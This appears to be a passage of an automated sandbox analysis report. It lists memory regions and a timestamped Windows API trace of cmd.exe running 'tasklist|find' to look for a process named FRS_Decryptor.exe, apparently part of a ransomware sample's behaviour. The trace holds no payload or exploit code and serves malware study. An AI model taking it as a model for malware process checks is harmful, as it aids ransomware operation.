0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7397 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7398 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7399 start_va = 0x810000 end_va = 0x81ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 7400 start_va = 0x9c0000 end_va = 0xa3dfff entry_point = 0x9c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7401 start_va = 0xb70000 end_va = 0xb7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b70000" filename = "" Region: id = 7402 start_va = 0xc40000 end_va = 0xd3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 7403 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7404 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7405 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7406 start_va = 0x7e9e0000 end_va = 0x7eadffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e9e0000" filename = "" Region: id = 7407 start_va = 0x820000 end_va = 0x823fff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 7408 start_va = 0xd40000 end_va = 0x1014fff entry_point = 0xd40000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7427 start_va = 0x830000 end_va = 0x833fff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Thread: id = 403 os_tid = 0xbb0 [0132.790] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0132.791] __set_app_type (_Type=0x1) [0132.791] __p__fmode () returned 0x76ea1768 [0132.791] __p__commode () returned 0x76ea176c [0132.791] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0132.791] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0132.791] GetCurrentThreadId () returned 0xbb0 [0132.791] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbb0) returned 0x34 [0132.791] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0132.791] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0132.791] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.793] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0132.793] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x98fd18 | out: phkResult=0x98fd18*=0x0) returned 0x2 [0132.793] VirtualQuery (in: lpAddress=0x98fd27, lpBuffer=0x98fcc0, dwLength=0x1c | out: lpBuffer=0x98fcc0*(BaseAddress=0x98f000, AllocationBase=0x890000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.793] VirtualQuery (in: lpAddress=0x890000, lpBuffer=0x98fcc0, dwLength=0x1c | out: lpBuffer=0x98fcc0*(BaseAddress=0x890000, AllocationBase=0x890000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0132.793] VirtualQuery (in: lpAddress=0x891000, lpBuffer=0x98fcc0, dwLength=0x1c | out: lpBuffer=0x98fcc0*(BaseAddress=0x891000, AllocationBase=0x890000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0132.793] VirtualQuery (in: lpAddress=0x893000, lpBuffer=0x98fcc0, dwLength=0x1c | out: lpBuffer=0x98fcc0*(BaseAddress=0x893000, AllocationBase=0x890000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.793] VirtualQuery (in: lpAddress=0x990000, lpBuffer=0x98fcc0, dwLength=0x1c | out: lpBuffer=0x98fcc0*(BaseAddress=0x990000, AllocationBase=0x990000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0132.793] GetConsoleOutputCP () returned 0x1b5 [0132.793] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0132.793] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0132.793] _get_osfhandle (_FileHandle=1) returned 0x2e8 [0132.793] SetConsoleMode (hConsoleHandle=0x2e8, dwMode=0x0) returned 0 [0132.793] _get_osfhandle (_FileHandle=1) returned 0x2e8 [0132.793] GetConsoleMode (in: hConsoleHandle=0x2e8, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0132.793] _get_osfhandle (_FileHandle=0) returned 0x24 [0132.793] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0132.793] GetEnvironmentStringsW () returned 0xc440c0* [0132.794] FreeEnvironmentStringsA (penv="=") returned 1 [0132.794] GetEnvironmentStringsW () returned 0xc440c0* [0132.794] FreeEnvironmentStringsA (penv="=") returned 1 [0132.794] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x98ec68 | out: phkResult=0x98ec68*=0x44) returned 0x0 [0132.794] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x98ec70, lpData=0x98ec74, lpcbData=0x98ec6c*=0x1000 | out: lpType=0x98ec70*=0x0, lpData=0x98ec74*=0xcc, lpcbData=0x98ec6c*=0x1000) returned 0x2 [0132.794] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x98ec70, lpData=0x98ec74, lpcbData=0x98ec6c*=0x1000 | out: lpType=0x98ec70*=0x4, lpData=0x98ec74*=0x1, lpcbData=0x98ec6c*=0x4) returned 0x0 [0132.794] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x98ec70, lpData=0x98ec74, lpcbData=0x98ec6c*=0x1000 | out: lpType=0x98ec70*=0x0, lpData=0x98ec74*=0x1, lpcbData=0x98ec6c*=0x1000) returned 0x2 [0132.794] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x98ec70, lpData=0x98ec74, lpcbData=0x98ec6c*=0x1000 | out: lpType=0x98ec70*=0x4, lpData=0x98ec74*=0x0, lpcbData=0x98ec6c*=0x4) returned 0x0 [0132.794] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x98ec70, lpData=0x98ec74, lpcbData=0x98ec6c*=0x1000 | out: lpType=0x98ec70*=0x4, lpData=0x98ec74*=0x40, lpcbData=0x98ec6c*=0x4) returned 0x0 [0132.794] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x98ec70, lpData=0x98ec74, lpcbData=0x98ec6c*=0x1000 | out: lpType=0x98ec70*=0x4, lpData=0x98ec74*=0x40, lpcbData=0x98ec6c*=0x4) returned 0x0 [0132.794] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x98ec70, lpData=0x98ec74, lpcbData=0x98ec6c*=0x1000 | out: lpType=0x98ec70*=0x0, lpData=0x98ec74*=0x40, lpcbData=0x98ec6c*=0x1000) returned 0x2 [0132.794] RegCloseKey (hKey=0x44) returned 0x0 [0132.794] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x98ec68 | out: phkResult=0x98ec68*=0x44) returned 0x0 [0132.794] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x98ec70, lpData=0x98ec74, lpcbData=0x98ec6c*=0x1000 | out: lpType=0x98ec70*=0x0, lpData=0x98ec74*=0x40, lpcbData=0x98ec6c*=0x1000) returned 0x2 [0132.794] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x98ec70, lpData=0x98ec74, lpcbData=0x98ec6c*=0x1000 | out: lpType=0x98ec70*=0x4, lpData=0x98ec74*=0x1, lpcbData=0x98ec6c*=0x4) returned 0x0 [0132.794] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x98ec70, lpData=0x98ec74, lpcbData=0x98ec6c*=0x1000 | out: lpType=0x98ec70*=0x0, lpData=0x98ec74*=0x1, lpcbData=0x98ec6c*=0x1000) returned 0x2 [0132.794] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x98ec70, lpData=0x98ec74, lpcbData=0x98ec6c*=0x1000 | out: lpType=0x98ec70*=0x4, lpData=0x98ec74*=0x0, lpcbData=0x98ec6c*=0x4) returned 0x0 [0132.794] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x98ec70, lpData=0x98ec74, lpcbData=0x98ec6c*=0x1000 | out: lpType=0x98ec70*=0x4, lpData=0x98ec74*=0x9, lpcbData=0x98ec6c*=0x4) returned 0x0 [0132.794] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x98ec70, lpData=0x98ec74, lpcbData=0x98ec6c*=0x1000 | out: lpType=0x98ec70*=0x4, lpData=0x98ec74*=0x9, lpcbData=0x98ec6c*=0x4) returned 0x0 [0132.794] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x98ec70, lpData=0x98ec74, lpcbData=0x98ec6c*=0x1000 | out: lpType=0x98ec70*=0x0, lpData=0x98ec74*=0x9, lpcbData=0x98ec6c*=0x1000) returned 0x2 [0132.794] RegCloseKey (hKey=0x44) returned 0x0 [0132.794] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa500af [0132.794] srand (_Seed=0x5aa500af) [0132.794] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0132.794] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0132.794] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0132.794] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xc440c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0132.795] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0132.795] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0132.795] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0132.795] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0132.795] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0132.795] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0132.795] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0132.795] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0132.795] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0132.795] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0132.795] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0132.795] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0132.795] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0132.795] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x98fa48 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0132.795] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0x98fa48, lpFilePart=0x98fa44 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0x98fa44*="Desktop") returned 0x1c [0132.795] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0132.795] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x98f7c0 | out: lpFindFileData=0x98f7c0) returned 0xc442d8 [0132.795] FindClose (in: hFindFile=0xc442d8 | out: hFindFile=0xc442d8) returned 1 [0132.795] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0x98f7c0 | out: lpFindFileData=0x98f7c0) returned 0xc442d8 [0132.795] FindClose (in: hFindFile=0xc442d8 | out: hFindFile=0xc442d8) returned 1 [0132.795] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0132.795] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0x98f7c0 | out: lpFindFileData=0x98f7c0) returned 0xc442d8 [0132.796] FindClose (in: hFindFile=0xc442d8 | out: hFindFile=0xc442d8) returned 1 [0132.796] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0132.796] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0132.796] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0132.796] GetEnvironmentStringsW () returned 0xc46190* [0132.796] FreeEnvironmentStringsA (penv="=") returned 1 [0132.796] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0132.796] GetConsoleOutputCP () returned 0x1b5 [0132.796] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0132.796] GetUserDefaultLCID () returned 0x409 [0132.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0132.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x98fb74, cchData=128 | out: lpLCData="0") returned 2 [0132.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x98fb74, cchData=128 | out: lpLCData="0") returned 2 [0132.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x98fb74, cchData=128 | out: lpLCData="1") returned 2 [0132.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0132.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0132.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0132.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0132.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0132.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0132.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0132.797] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0132.797] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0132.797] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0132.797] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0132.798] GetConsoleTitleW (in: lpConsoleTitle=0xc44e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0132.798] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0132.798] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0132.798] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0132.798] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0132.799] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0132.799] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0132.799] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0132.799] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0132.799] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0132.799] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0132.799] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0132.799] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0132.799] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0132.799] _wcsicmp (_String1="IF", _String2="find") returned 3 [0132.799] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0132.799] _wcsicmp (_String1="REM", _String2="find") returned 12 [0132.799] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0132.800] _pipe (in: _PtHandles=0xc451f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xc451f0) returned 0 [0132.800] _dup (_FileHandle=1) returned 5 [0132.800] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0132.800] _close (_FileHandle=4) returned 0 [0132.801] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0132.801] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0132.801] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0132.801] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0132.801] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0132.801] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0132.801] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0132.801] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0132.801] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0132.801] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0132.801] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0132.801] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0132.801] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0132.801] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0132.801] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0132.801] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0132.801] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0132.801] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0132.801] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0132.801] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0132.801] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0132.801] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0132.801] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0132.801] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0132.801] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0132.801] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0132.801] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0132.801] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0132.801] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0132.801] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0132.801] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0132.801] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0132.801] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0132.801] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0132.801] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0132.801] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0132.801] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0132.801] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0132.801] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0132.801] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0132.801] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0132.801] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0132.801] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0132.801] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0132.801] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0132.801] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0132.801] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0132.801] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0132.801] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0132.802] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0132.802] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0132.802] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0132.802] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0132.802] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0132.802] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0132.802] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0132.802] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0132.802] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0132.802] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0132.802] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0132.802] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0132.802] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0132.802] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0132.802] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0132.802] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0132.802] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0132.802] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0132.802] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0132.802] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0132.802] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0132.802] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0132.802] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0132.802] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0132.802] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0132.802] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0132.802] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0132.802] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0132.802] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0132.802] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0132.802] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0132.802] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0132.802] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0132.802] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0132.802] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0132.802] _wcsicmp (_String1="tasklist", _String2="FOR") returned 14 [0132.802] _wcsicmp (_String1="tasklist", _String2="IF") returned 11 [0132.802] _wcsicmp (_String1="tasklist", _String2="REM") returned 2 [0132.802] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0132.802] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0132.802] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0132.802] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0132.802] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0132.802] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0132.802] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0132.803] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0132.803] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0132.803] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0132.803] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0132.803] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0132.803] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0132.803] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0132.803] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0132.803] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0132.803] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0132.803] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0132.803] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0132.803] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0132.803] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0132.803] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0132.803] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0132.803] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0132.803] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0132.803] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0132.803] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0132.803] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0132.803] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0132.803] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0132.803] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0132.803] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0132.803] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0132.803] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0132.803] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0132.803] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0132.803] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0132.803] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0132.803] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0132.803] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0132.803] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0132.803] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0132.803] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0132.803] SetErrorMode (uMode=0x0) returned 0x0 